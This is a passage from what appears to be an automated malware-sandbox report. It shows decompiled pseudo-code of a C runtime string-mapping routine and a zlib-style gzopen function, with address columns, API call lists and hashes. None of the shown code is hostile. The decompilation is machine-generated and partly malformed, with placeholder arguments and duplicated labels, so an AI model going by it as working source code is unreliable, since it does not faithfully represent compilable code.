									goto L78;
								}
								__eflags = _t121 - 0xffffffe0;
								if(_t121 > 0xffffffe0) {
									goto L71;
								}
								_t127 =  &(_t121[4]);
								__eflags = _t127 - 0x400;
								if(_t127 > 0x400) {
									_t128 = E0040B84D(0, _t179, _t182, _t127);
									__eflags = _t128;
									if(_t128 != 0) {
										 *_t128 = 0xdddd;
										_t128 = _t128 + 8;
										__eflags = _t128;
									}
									_t182 = _t128;
									goto L72;
								}
								E0040CFB0(_t127);
								_t182 = _t191;
								__eflags = _t182;
								if(_t182 == 0) {
									goto L62;
								}
								 *_t182 = 0xcccc;
								_t182 = _t182 + 8;
								goto L72;
							}
							L62:
							_t184 = 0;
							goto L78;
						} else {
							goto L58;
						}
					} else {
						if(_t112 != 1) {
							L58:
							_t116 = 0;
							L84:
							return E0040CE09(_t116, 0, _v8 ^ _t188, _t179, _t182, _t184);
						}
						_v12 = 0;
						if(_a28 == 0) {
							_a28 =  *((intOrPtr*)( *_t184 + 4));
						}
						_t184 = MultiByteToWideChar;
						_t182 = MultiByteToWideChar(_a28, 1 + (0 | _a32 != 0x00000000) * 8, _a12, _a16, 0, 0);
						_t207 = _t182;
						if(_t207 == 0) {
							goto L58;
						} else {
							if(_t207 <= 0) {
								L28:
								_v16 = 0;
								L29:
								if(_v16 == 0) {
									goto L58;
								}
								if(MultiByteToWideChar(_a28, 1, _a12, _a16, _v16, _t182) == 0) {
									L52:
									E004147AE(_v16);
									_t116 = _v12;
									goto L84;
								}
								_t184 = LCMapStringW;
								_t174 = LCMapStringW(_a4, _a8, _v16, _t182, 0, 0);
								_v12 = _t174;
								if(_t174 == 0) {
									goto L52;
								}
								if((_a8 & 0x00000400) == 0) {
									__eflags = _t174;
									if(_t174 <= 0) {
										L44:
										_t184 = 0;
										__eflags = 0;
										L45:
										__eflags = _t184;
										if(_t184 != 0) {
											_t141 = LCMapStringW(_a4, _a8, _v16, _t182, _t184, _v12);
											__eflags = _t141;
											if(_t141 != 0) {
												_push(0);
												_push(0);
												__eflags = _a24;
												if(_a24 != 0) {
													_push(_a24);
													_push(_a20);
												} else {
													_push(0);
													_push(0);
												}
												_v12 = WideCharToMultiByte(_a28, 0, _t184, _v12, ??, ??, ??, ??);
											}
											E004147AE(_t184);
										}
										goto L52;
									}
									_t144 = 0xffffffe0;
									_t179 = _t144 % _t174;
									__eflags = _t144 / _t174 - 2;
									if(_t144 / _t174 < 2) {
										goto L44;
									}
									_t52 = _t174 + 8; // 0x8
									_t146 = _t174 + _t52;
									__eflags = _t146 - 0x400;
									if(_t146 > 0x400) {
										_t147 = E0040B84D(0, _t179, _t182, _t146);
										__eflags = _t147;
										if(_t147 != 0) {
											 *_t147 = 0xdddd;
											_t147 =  &(_t147[4]);
											__eflags = _t147;
										}
										_t184 = _t147;
										goto L45;
									}
									E0040CFB0(_t146);
									_t184 = _t189;
									__eflags = _t184;
									if(_t184 == 0) {
										goto L52;
									}
									 *_t184 = 0xcccc;
									_t184 =  &(_t184[4]);
									goto L45;
								}
								if(_a24 != 0 && _t174 <= _a24) {
									LCMapStringW(_a4, _a8, _v16, _t182, _a20, _a24);
								}
								goto L52;
							}
							_t150 = 0xffffffe0;
							_t179 = _t150 % _t182;
							if(_t150 / _t182 < 2) {
								goto L28;
							}
							_t25 = _t182 + 8; // 0x8
							_t152 = _t182 + _t25;
							if(_t182 + _t25 > 0x400) {
								_t153 = E0040B84D(0, _t179, _t182, _t152);
								__eflags = _t153;
								if(_t153 == 0) {
									L27:
									_v16 = _t153;
									goto L29;
								}
								 *_t153 = 0xdddd;
								L26:
								_t153 =  &(_t153[4]);
								goto L27;
							}
							E0040CFB0(_t152);
							_t153 = _t189;
							if(_t153 == 0) {
								goto L27;
							}
							 *_t153 = 0xcccc;
							goto L26;
						}
					}
				}
				_t178 = _a16;
				_t157 = _a12;
				while(1) {
					_t178 = _t178 - 1;
					if( *_t157 == 0) {
						break;
					}
					_t157 =  &(_t157[1]);
					if(_t178 != 0) {
						continue;
					}
					_t178 = _t178 | 0xffffffff;
					break;
				}
				_t160 = _a16 - _t178 - 1;
				if(_t160 < _a16) {
					_t160 = _t160 + 1;
				}
				_a16 = _t160;
				goto L13;
			}











































                                                                                                                                                  0x00417089
                                                                                                                                                  0x00417090
                                                                                                                                                  0x00417098
                                                                                                                                                  0x0041709a
                                                                                                                                                  0x004170a0
                                                                                                                                                  0x004170a6
                                                                                                                                                  0x004170bb
                                                                                                                                                  0x004170c5
                                                                                                                                                  0x004170cb
                                                                                                                                                  0x004170ce
                                                                                                                                                  0x004170d0
                                                                                                                                                  0x004170d0
                                                                                                                                                  0x004170bd
                                                                                                                                                  0x004170bd
                                                                                                                                                  0x004170bd
                                                                                                                                                  0x004170bb
                                                                                                                                                  0x004170dd
                                                                                                                                                  0x00417101
                                                                                                                                                  0x00417101
                                                                                                                                                  0x00417109
                                                                                                                                                  0x004172bb
                                                                                                                                                  0x004172be
                                                                                                                                                  0x004172c1
                                                                                                                                                  0x004172c4
                                                                                                                                                  0x004172cb
                                                                                                                                                  0x004172cb
                                                                                                                                                  0x004172ce
                                                                                                                                                  0x004172d1
                                                                                                                                                  0x004172d8
                                                                                                                                                  0x004172d8
                                                                                                                                                  0x004172de
                                                                                                                                                  0x004172e4
                                                                                                                                                  0x004172e7
                                                                                                                                                  0x004172ea
                                                                                                                                                  0x004172f3
                                                                                                                                                  0x004172f6
                                                                                                                                                  0x004173ef
                                                                                                                                                  0x004173f1
                                                                                                                                                  0x004173f1
                                                                                                                                                  0x004173f4
                                                                                                                                                  0x004173f6
                                                                                                                                                  0x004173f9
                                                                                                                                                  0x004173fe
                                                                                                                                                  0x004173ff
                                                                                                                                                  0x00417402
                                                                                                                                                  0x00417404
                                                                                                                                                  0x00417406
                                                                                                                                                  0x00417409
                                                                                                                                                  0x0041740b
                                                                                                                                                  0x0041740c
                                                                                                                                                  0x00417411
                                                                                                                                                  0x00417409
                                                                                                                                                  0x00417412
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00417412
                                                                                                                                                  0x00417309
                                                                                                                                                  0x0041730e
                                                                                                                                                  0x00417311
                                                                                                                                                  0x00417314
                                                                                                                                                  0x00417316
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0041732a
                                                                                                                                                  0x0041732c
                                                                                                                                                  0x0041732f
                                                                                                                                                  0x00417331
                                                                                                                                                  0x0041733a
                                                                                                                                                  0x00417379
                                                                                                                                                  0x00417379
                                                                                                                                                  0x00417379
                                                                                                                                                  0x0041737b
                                                                                                                                                  0x0041737b
                                                                                                                                                  0x0041737d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00417384
                                                                                                                                                  0x0041739c
                                                                                                                                                  0x0041739e
                                                                                                                                                  0x004173a1
                                                                                                                                                  0x004173a3
                                                                                                                                                  0x004173bf
                                                                                                                                                  0x004173c1
                                                                                                                                                  0x004173c9
                                                                                                                                                  0x004173cb
                                                                                                                                                  0x004173cb
                                                                                                                                                  0x004173a5
                                                                                                                                                  0x004173a5
                                                                                                                                                  0x004173a5
                                                                                                                                                  0x004173cf
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004173d4
                                                                                                                                                  0x0041733c
                                                                                                                                                  0x0041733f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00417341
                                                                                                                                                  0x00417344
                                                                                                                                                  0x00417349
                                                                                                                                                  0x00417362
                                                                                                                                                  0x00417368
                                                                                                                                                  0x0041736a
                                                                                                                                                  0x0041736c
                                                                                                                                                  0x00417372
                                                                                                                                                  0x00417372
                                                                                                                                                  0x00417372
                                                                                                                                                  0x00417375
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00417375
                                                                                                                                                  0x0041734b
                                                                                                                                                  0x00417350
                                                                                                                                                  0x00417352
                                                                                                                                                  0x00417354
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00417356
                                                                                                                                                  0x0041735c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0041735c
                                                                                                                                                  0x00417333
                                                                                                                                                  0x00417333
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00417117
                                                                                                                                                  0x0041711a
                                                                                                                                                  0x004172ec
                                                                                                                                                  0x004172ec
                                                                                                                                                  0x00417414
                                                                                                                                                  0x00417425
                                                                                                                                                  0x00417425
                                                                                                                                                  0x00417120
                                                                                                                                                  0x00417126
                                                                                                                                                  0x0041712d
                                                                                                                                                  0x0041712d
                                                                                                                                                  0x00417130
                                                                                                                                                  0x00417153
                                                                                                                                                  0x00417155
                                                                                                                                                  0x00417157
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0041715d
                                                                                                                                                  0x0041715d
                                                                                                                                                  0x004171a2
                                                                                                                                                  0x004171a2
                                                                                                                                                  0x004171a5
                                                                                                                                                  0x004171a8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004171c1
                                                                                                                                                  0x004172aa
                                                                                                                                                  0x004172ad
                                                                                                                                                  0x004172b2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004172b5
                                                                                                                                                  0x004171c7
                                                                                                                                                  0x004171db
                                                                                                                                                  0x004171dd
                                                                                                                                                  0x004171e2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004171ef
                                                                                                                                                  0x0041721a
                                                                                                                                                  0x0041721c
                                                                                                                                                  0x00417263
                                                                                                                                                  0x00417263
                                                                                                                                                  0x00417263
                                                                                                                                                  0x00417265
                                                                                                                                                  0x00417265
                                                                                                                                                  0x00417267
                                                                                                                                                  0x00417277
                                                                                                                                                  0x0041727d
                                                                                                                                                  0x0041727f
                                                                                                                                                  0x00417281
                                                                                                                                                  0x00417282
                                                                                                                                                  0x00417283
                                                                                                                                                  0x00417286
                                                                                                                                                  0x0041728c
                                                                                                                                                  0x0041728f
                                                                                                                                                  0x00417288
                                                                                                                                                  0x00417288
                                                                                                                                                  0x00417289
                                                                                                                                                  0x00417289
                                                                                                                                                  0x004172a0
                                                                                                                                                  0x004172a0
                                                                                                                                                  0x004172a4
                                                                                                                                                  0x004172a9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00417267
                                                                                                                                                  0x00417222
                                                                                                                                                  0x00417223
                                                                                                                                                  0x00417225
                                                                                                                                                  0x00417228
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0041722a
                                                                                                                                                  0x0041722a
                                                                                                                                                  0x0041722e
                                                                                                                                                  0x00417233
                                                                                                                                                  0x0041724c
                                                                                                                                                  0x00417252
                                                                                                                                                  0x00417254
                                                                                                                                                  0x00417256
                                                                                                                                                  0x0041725c
                                                                                                                                                  0x0041725c
                                                                                                                                                  0x0041725c
                                                                                                                                                  0x0041725f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0041725f
                                                                                                                                                  0x00417235
                                                                                                                                                  0x0041723a
                                                                                                                                                  0x0041723c
                                                                                                                                                  0x0041723e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00417240
                                                                                                                                                  0x00417246
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00417246
                                                                                                                                                  0x004171f4
                                                                                                                                                  0x00417213
                                                                                                                                                  0x00417213
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004171f4
                                                                                                                                                  0x00417163
                                                                                                                                                  0x00417164
                                                                                                                                                  0x00417169
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0041716b
                                                                                                                                                  0x0041716b
                                                                                                                                                  0x00417174
                                                                                                                                                  0x0041718a
                                                                                                                                                  0x00417190
                                                                                                                                                  0x00417192
                                                                                                                                                  0x0041719d
                                                                                                                                                  0x0041719d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0041719d
                                                                                                                                                  0x00417194
                                                                                                                                                  0x0041719a
                                                                                                                                                  0x0041719a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0041719a
                                                                                                                                                  0x00417176
                                                                                                                                                  0x0041717b
                                                                                                                                                  0x0041717f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00417181
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00417181
                                                                                                                                                  0x00417157
                                                                                                                                                  0x00417109
                                                                                                                                                  0x004170df
                                                                                                                                                  0x004170e2
                                                                                                                                                  0x004170e5
                                                                                                                                                  0x004170e5
                                                                                                                                                  0x004170e8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004170ea
                                                                                                                                                  0x004170ed
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004170ef
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004170ef
                                                                                                                                                  0x004170f7
                                                                                                                                                  0x004170fb
                                                                                                                                                  0x004170fd
                                                                                                                                                  0x004170fd
                                                                                                                                                  0x004170fe
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,004C18E0), ref: 004170C5
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                                                                                                  • _malloc.LIBCMT ref: 0041718A
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                                                                                                  • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                                                                                                  • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                                                                                                  • _malloc.LIBCMT ref: 0041724C
                                                                                                                                                  • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                                                                                                  • __freea.LIBCMT ref: 004172A4
                                                                                                                                                  • __freea.LIBCMT ref: 004172AD
                                                                                                                                                  • ___ansicp.LIBCMT ref: 004172DE
                                                                                                                                                  • ___convertcp.LIBCMT ref: 00417309
                                                                                                                                                  • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                                                                                                  • _malloc.LIBCMT ref: 00417362
                                                                                                                                                  • _memset.LIBCMT ref: 00417384
                                                                                                                                                  • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                                                                                                  • ___convertcp.LIBCMT ref: 004173BA
                                                                                                                                                  • __freea.LIBCMT ref: 004173CF
                                                                                                                                                  • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927182410.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.927267311.0000000000426000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.927294895.000000000045A000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3809854901-0
                                                                                                                                                  • Opcode ID: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                                                                  • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                                                                                                  • Opcode Fuzzy Hash: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                                                                  • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 004057B0, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                                  			E004057B0(intOrPtr* __eax) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t57;
				char* _t60;
				char _t62;
				intOrPtr _t63;
				char _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t74;
				intOrPtr _t79;
				intOrPtr _t82;
				intOrPtr* _t83;
				void* _t86;
				char* _t88;
				char* _t89;
				intOrPtr* _t91;
				intOrPtr* _t93;
				signed int _t97;
				signed int _t98;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;

				_t98 = _t97 | 0xffffffff;
				 *((intOrPtr*)(_t100 + 0xc)) = 0;
				_t91 = __eax;
				 *((intOrPtr*)(_t100 + 0x10)) = _t100 + 0x10;
				if( *((intOrPtr*)(_t100 + 0x68)) == 0 || __eax == 0) {
					__eflags = 0;
					return 0;
				} else {
					_t93 = E0040B84D(0, _t86, __eax, 0x74);
					_t101 = _t100 + 4;
					if(_t93 == 0) {
						L31:
						return 0;
					} else {
						 *((intOrPtr*)(_t93 + 0x20)) = 0;
						 *((intOrPtr*)(_t93 + 0x24)) = 0;
						 *((intOrPtr*)(_t93 + 0x28)) = 0;
						 *((intOrPtr*)(_t93 + 0x44)) = 0;
						 *_t93 = 0;
						 *((intOrPtr*)(_t93 + 0x48)) = 0;
						 *((intOrPtr*)(_t93 + 0xc)) = 0;
						 *((intOrPtr*)(_t93 + 0x10)) = 0;
						 *((intOrPtr*)(_t93 + 4)) = 0;
						 *((intOrPtr*)(_t93 + 0x40)) = 0;
						 *((intOrPtr*)(_t93 + 0x38)) = 0;
						 *((intOrPtr*)(_t93 + 0x3c)) = 0;
						 *((intOrPtr*)(_t93 + 0x64)) = 0;
						 *((intOrPtr*)(_t93 + 0x68)) = 0;
						 *(_t93 + 0x6c) = _t98;
						 *((intOrPtr*)(_t93 + 0x4c)) = E00403080(0, 0, 0);
						_t57 =  *((intOrPtr*)(_t101 + 0x78));
						_t102 = _t101 + 0xc;
						 *((intOrPtr*)(_t93 + 0x50)) = 0;
						 *((intOrPtr*)(_t93 + 0x58)) = 0;
						_t87 = _t57 + 1;
						do {
							_t82 =  *_t57;
							_t57 = _t57 + 1;
						} while (_t82 != 0);
						_t60 = E0040B84D(0, _t87, _t91, _t57 - _t87 + 1);
						_t103 = _t102 + 4;
						 *((intOrPtr*)(_t93 + 0x54)) = _t60;
						if(_t60 == 0) {
							L30:
							E00405160(0, _t87, _t93);
							goto L31;
						} else {
							_t83 =  *((intOrPtr*)(_t103 + 0x6c));
							_t88 = _t60;
							goto L7;
							L9:
							L9:
							if( *_t91 == 0x72) {
								 *((char*)(_t93 + 0x5c)) = 0x72;
							}
							_t63 =  *_t91;
							if(_t63 == 0x77 || _t63 == 0x61) {
								 *((char*)(_t93 + 0x5c)) = 0x77;
							}
							_t64 =  *_t91;
							if(_t64 < 0x30 || _t64 > 0x39) {
								__eflags = _t64 - 0x66;
								if(_t64 != 0x66) {
									__eflags = _t64 - 0x68;
									if(_t64 != 0x68) {
										__eflags = _t64 - 0x52;
										if(_t64 != 0x52) {
											_t89 =  *((intOrPtr*)(_t103 + 0x14));
											 *_t89 = _t64;
											_t87 = _t89 + 1;
											__eflags = _t87;
											 *((intOrPtr*)(_t103 + 0x14)) = _t87;
										} else {
											 *((intOrPtr*)(_t103 + 0x10)) = 3;
										}
									} else {
										 *((intOrPtr*)(_t103 + 0x10)) = 2;
									}
								} else {
									 *((intOrPtr*)(_t103 + 0x10)) = 1;
								}
							} else {
								_t98 = _t64 - 0x30;
							}
							_t91 = _t91 + 1;
							if(_t64 == 0) {
								goto L26;
							}
							_t87 = _t103 + 0x68;
							if( *((intOrPtr*)(_t103 + 0x14)) != _t103 + 0x68) {
								goto L9;
							}
							L26:
							_t65 =  *((intOrPtr*)(_t93 + 0x5c));
							if(_t65 == 0) {
								goto L30;
							} else {
								if(_t65 != 0x77) {
									_t66 = E0040B84D(0, _t87, _t91, 0x4000);
									 *((intOrPtr*)(_t93 + 0x44)) = _t66;
									 *_t93 = _t66;
									_t67 = E004071A0(_t93, 0xfffffff1, "1.2.3", 0x38);
									_t104 = _t103 + 0x14;
									__eflags = _t67;
									if(_t67 != 0) {
										goto L30;
									} else {
										__eflags =  *((intOrPtr*)(_t93 + 0x44));
										if(__eflags == 0) {
											goto L30;
										} else {
											goto L34;
										}
									}
								} else {
									_push(0x38);
									_push("1.2.3");
									_push( *((intOrPtr*)(_t103 + 0x10)));
									_push(8);
									_push(0xfffffff1);
									_push(8);
									_push(_t98);
									_push(_t93);
									_t91 = E00404CE0();
									_t79 = E0040B84D(0, _t87, _t91, 0x4000);
									_t104 = _t103 + 0x24;
									 *((intOrPtr*)(_t93 + 0x48)) = _t79;
									 *((intOrPtr*)(_t93 + 0xc)) = _t79;
									if(_t91 != 0 || _t79 == 0) {
										goto L30;
									} else {
										L34:
										 *((intOrPtr*)(_t93 + 0x10)) = 0x4000;
										 *((intOrPtr*)(E0040BFC1(__eflags))) = 0;
										_t69 =  *((intOrPtr*)(_t104 + 0x70));
										__eflags = _t69;
										_push(_t104 + 0x18);
										if(__eflags >= 0) {
											_push(_t69);
											_t70 = E0040C953(0, _t87, _t91, _t93, __eflags);
										} else {
											_t87 =  *((intOrPtr*)(_t104 + 0x70));
											_push( *((intOrPtr*)(_t104 + 0x70)));
											_t70 = E0040CB9D();
										}
										 *((intOrPtr*)(_t93 + 0x40)) = _t70;
										__eflags = _t70;
										if(_t70 == 0) {
											goto L30;
										} else {
											__eflags =  *((char*)(_t93 + 0x5c)) - 0x77;
											if( *((char*)(_t93 + 0x5c)) != 0x77) {
												E00405000(_t93, 0);
												_push( *((intOrPtr*)(_t93 + 0x40)));
												_t74 = E0040C8E5(0,  *((intOrPtr*)(_t93 + 0x40)), _t91, _t93, __eflags) -  *((intOrPtr*)(_t93 + 4));
												__eflags = _t74;
												 *((intOrPtr*)(_t93 + 0x60)) = _t74;
												return _t93;
											} else {
												 *((intOrPtr*)(_t93 + 0x60)) = 0xa;
												return _t93;
											}
										}
									}
								}
							}
							goto L42;
							L7:
							_t62 =  *_t83;
							 *_t88 = _t62;
							_t83 = _t83 + 1;
							_t88 = _t88 + 1;
							if(_t62 != 0) {
								goto L7;
							} else {
								 *((char*)(_t93 + 0x5c)) = 0;
							}
							goto L9;
						}
					}
				}
				L42:
			}

































                                                                                                                                                  0x004057b7
                                                                                                                                                  0x004057bf
                                                                                                                                                  0x004057c3
                                                                                                                                                  0x004057c5
                                                                                                                                                  0x004057cd
                                                                                                                                                  0x004059c8
                                                                                                                                                  0x004059ce
                                                                                                                                                  0x004057db
                                                                                                                                                  0x004057e3
                                                                                                                                                  0x004057e5
                                                                                                                                                  0x004057ea
                                                                                                                                                  0x00405921
                                                                                                                                                  0x0040592a
                                                                                                                                                  0x004057f0
                                                                                                                                                  0x004057f3
                                                                                                                                                  0x004057f6
                                                                                                                                                  0x004057f9
                                                                                                                                                  0x004057fc
                                                                                                                                                  0x004057ff
                                                                                                                                                  0x00405801
                                                                                                                                                  0x00405804
                                                                                                                                                  0x00405807
                                                                                                                                                  0x0040580a
                                                                                                                                                  0x0040580d
                                                                                                                                                  0x00405810
                                                                                                                                                  0x00405813
                                                                                                                                                  0x00405816
                                                                                                                                                  0x00405819
                                                                                                                                                  0x0040581c
                                                                                                                                                  0x00405824
                                                                                                                                                  0x00405827
                                                                                                                                                  0x0040582b
                                                                                                                                                  0x0040582e
                                                                                                                                                  0x00405831
                                                                                                                                                  0x00405834
                                                                                                                                                  0x00405837
                                                                                                                                                  0x00405837
                                                                                                                                                  0x00405839
                                                                                                                                                  0x0040583a
                                                                                                                                                  0x00405842
                                                                                                                                                  0x00405847
                                                                                                                                                  0x0040584a
                                                                                                                                                  0x0040584f
                                                                                                                                                  0x0040591c
                                                                                                                                                  0x0040591c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405855
                                                                                                                                                  0x00405855
                                                                                                                                                  0x00405859
                                                                                                                                                  0x0040585b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405870
                                                                                                                                                  0x00405872
                                                                                                                                                  0x00405874
                                                                                                                                                  0x00405874
                                                                                                                                                  0x00405877
                                                                                                                                                  0x0040587b
                                                                                                                                                  0x00405881
                                                                                                                                                  0x00405881
                                                                                                                                                  0x00405885
                                                                                                                                                  0x00405889
                                                                                                                                                  0x00405897
                                                                                                                                                  0x00405899
                                                                                                                                                  0x004058a5
                                                                                                                                                  0x004058a7
                                                                                                                                                  0x004058b3
                                                                                                                                                  0x004058b5
                                                                                                                                                  0x004058c1
                                                                                                                                                  0x004058c5
                                                                                                                                                  0x004058c7
                                                                                                                                                  0x004058c7
                                                                                                                                                  0x004058c8
                                                                                                                                                  0x004058b7
                                                                                                                                                  0x004058b7
                                                                                                                                                  0x004058b7
                                                                                                                                                  0x004058a9
                                                                                                                                                  0x004058a9
                                                                                                                                                  0x004058a9
                                                                                                                                                  0x0040589b
                                                                                                                                                  0x0040589b
                                                                                                                                                  0x0040589b
                                                                                                                                                  0x0040588f
                                                                                                                                                  0x00405892
                                                                                                                                                  0x00405892
                                                                                                                                                  0x004058cc
                                                                                                                                                  0x004058cf
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004058d1
                                                                                                                                                  0x004058d9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004058db
                                                                                                                                                  0x004058db
                                                                                                                                                  0x004058e0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004058e2
                                                                                                                                                  0x004058e4
                                                                                                                                                  0x00405930
                                                                                                                                                  0x0040593f
                                                                                                                                                  0x00405942
                                                                                                                                                  0x00405944
                                                                                                                                                  0x00405949
                                                                                                                                                  0x0040594c
                                                                                                                                                  0x0040594e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405950
                                                                                                                                                  0x00405950
                                                                                                                                                  0x00405953
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405953
                                                                                                                                                  0x004058e6
                                                                                                                                                  0x004058ea
                                                                                                                                                  0x004058ec
                                                                                                                                                  0x004058f1
                                                                                                                                                  0x004058f2
                                                                                                                                                  0x004058f4
                                                                                                                                                  0x004058f6
                                                                                                                                                  0x004058f8
                                                                                                                                                  0x004058f9
                                                                                                                                                  0x00405904
                                                                                                                                                  0x00405906
                                                                                                                                                  0x0040590b
                                                                                                                                                  0x0040590e
                                                                                                                                                  0x00405911
                                                                                                                                                  0x00405916
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405955
                                                                                                                                                  0x00405955
                                                                                                                                                  0x00405955
                                                                                                                                                  0x00405961
                                                                                                                                                  0x00405963
                                                                                                                                                  0x00405967
                                                                                                                                                  0x0040596d
                                                                                                                                                  0x0040596e
                                                                                                                                                  0x0040597c
                                                                                                                                                  0x0040597d
                                                                                                                                                  0x00405970
                                                                                                                                                  0x00405970
                                                                                                                                                  0x00405974
                                                                                                                                                  0x00405975
                                                                                                                                                  0x00405975
                                                                                                                                                  0x00405985
                                                                                                                                                  0x00405988
                                                                                                                                                  0x0040598a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040598c
                                                                                                                                                  0x0040598c
                                                                                                                                                  0x00405990
                                                                                                                                                  0x004059a5
                                                                                                                                                  0x004059ad
                                                                                                                                                  0x004059b6
                                                                                                                                                  0x004059b6
                                                                                                                                                  0x004059b9
                                                                                                                                                  0x004059c5
                                                                                                                                                  0x00405992
                                                                                                                                                  0x00405992
                                                                                                                                                  0x004059a2
                                                                                                                                                  0x004059a2
                                                                                                                                                  0x00405990
                                                                                                                                                  0x0040598a
                                                                                                                                                  0x00405916
                                                                                                                                                  0x004058e4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405860
                                                                                                                                                  0x00405860
                                                                                                                                                  0x00405862
                                                                                                                                                  0x00405864
                                                                                                                                                  0x00405865
                                                                                                                                                  0x00405868
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040586a
                                                                                                                                                  0x0040586a
                                                                                                                                                  0x0040586d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405868
                                                                                                                                                  0x0040584f
                                                                                                                                                  0x004057ea
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • _malloc.LIBCMT ref: 004057DE
                                                                                                                                                    • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
